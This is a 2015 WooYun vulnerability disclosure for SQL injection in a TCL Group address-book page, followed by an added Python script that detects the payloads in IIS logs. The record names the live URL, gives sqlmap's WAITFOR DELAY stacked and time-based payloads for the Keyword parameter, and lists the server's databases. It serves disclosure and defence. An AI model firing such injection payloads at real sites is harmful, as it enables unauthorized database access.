WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
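2015-03-03: Details reported to the vendor; awaiting vendor handling
2015-03-03: Vendor confirmed; details disclosed to the vendor only
2015-03-13: Details disclosed to core white hats and experts in related fields
2015-03-23: Details disclosed to regular white hats
2015-04-02: Details disclosed to trainee white hats
2015-04-17: Details disclosed to the public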
http://eip.tcl.com/phones/login.aspx
The TCL Group address book platform has a SQL injection.
sqlmap identified the following injection points with a total of 87 HTTP(s) requests:
---
Place: GET
Parameter: Keyword
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Keyword=jh'); WAITFOR DELAY '0:0:5'--&Checked=false

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Keyword=jh') WAITFOR DELAY '0:0:5'--&Checked=false
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: Keyword
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: Keyword=jh'); WAITFOR DELAY '0:0:5'--&Checked=false

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: Keyword=jh') WAITFOR DELAY '0:0:5'--&Checked=false
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
available databases [13]:
[*] cw
[*] jssystem
[*] magazine
[*] magazine_en
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] Survey
[*] tclContacts
[*] tclquestion
[*] tempdb
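OK, not going any deeper~
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-03-03 13:34
Thank you for your work; this has been forwarded to the relevant unit for handling.
None yet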
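The WAITFOR DELAY payloads in the sqlmap output above leave a recognisable trace in IIS W3C logs: a quote-breaking value in the Keyword parameter and a response time at least as long as the requested delay. The following detection logic is an added example, not part of the original report; the log lines are constructed, and the path /phones/search.aspx, the client IPs and the logged field set are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log lines (not from the original report); the path
# /phones/search.aspx and the client IPs are hypothetical placeholders.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2015-03-03 05:10:01 GET /phones/search.aspx Keyword=jh&Checked=false 192.0.2.10 200 120
2015-03-03 05:10:07 GET /phones/search.aspx Keyword=jh%27)%3B+WAITFOR+DELAY+%270:0:5%27--&Checked=false 192.0.2.66 200 5130
2015-03-03 05:10:13 GET /phones/search.aspx Keyword=jh%27)+WAITFOR+DELAY+%270:0:5%27--&Checked=false 192.0.2.66 200 5094
2015-03-03 05:11:40 GET /phones/search.aspx Keyword=O%27Brien&Checked=false 192.0.2.23 200 95
"""

# A quote that closes the string literal, followed by T-SQL delay syntax.
DELAY_RE = re.compile(r"'.*?\bWAITFOR\s+DELAY\s+'(\d+):(\d+):(\d+)", re.I | re.S)
# A quote, then a statement terminator starting a second (stacked) statement.
STACKED_RE = re.compile(r"'[^;]*;\s*\w", re.S)

def parse_w3c(text):
    """Yield one dict per request, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))

def find_delay_injection(text):
    """Return findings for query parameters carrying WAITFOR DELAY payloads."""
    findings = []
    for rec in parse_w3c(text):
        for pair in rec.get("cs-uri-query", "-").split("&"):
            name, _, raw = pair.partition("=")
            value = unquote_plus(raw)  # decode %27, %3B and '+' as logged
            m = DELAY_RE.search(value)
            if not m:
                continue
            h, mnt, s = map(int, m.groups())
            delay_ms = ((h * 60 + mnt) * 60 + s) * 1000
            findings.append({
                "ip": rec["c-ip"], "param": name,
                "stacked": bool(STACKED_RE.search(value)),
                # time-taken is in milliseconds; >= delay means the SQL ran.
                "executed": int(rec["time-taken"]) >= delay_ms,
            })
    return findings

if __name__ == "__main__":
    for finding in find_delay_injection(SAMPLE_LOG):
        print(finding)
```

A finding with "executed" set means the database actually honoured the delay, so the parameter is reaching the query unparameterised and the request should be treated as a confirmed injection rather than a probe.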